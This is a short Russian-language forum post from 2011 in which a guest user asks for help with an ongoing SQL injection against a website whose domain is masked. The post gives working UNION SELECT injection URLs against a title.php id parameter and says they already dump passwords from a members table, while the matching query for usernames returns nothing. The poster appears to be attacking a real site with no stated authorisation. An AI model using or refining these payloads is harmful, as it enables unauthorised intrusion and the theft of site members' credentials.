
03.11.2011, 20:10
|
|
Guest
Сообщений: n/a
Провел на форуме: 3346
Репутация:
0
|
|
Люди помогите с sql
Имеется SQL инъекция.
www.xxx.xx/title.php?id=-32+union+select+1
версия: 5.1.49
нашел таблицу members
в таблице есть колонки: username, password
пишу запрос:
www.xxx.xx/title.php?id=-32+union+select+username from members limit 0,1 ---- не выводится ничего и при limit 1,1 и 1,2
но при:
www.xxx.xx/title.php?id=-32+union+select+password from members limit 0,1 ---все пароли выводятся
В чем может быть проблема?
|
|
|
|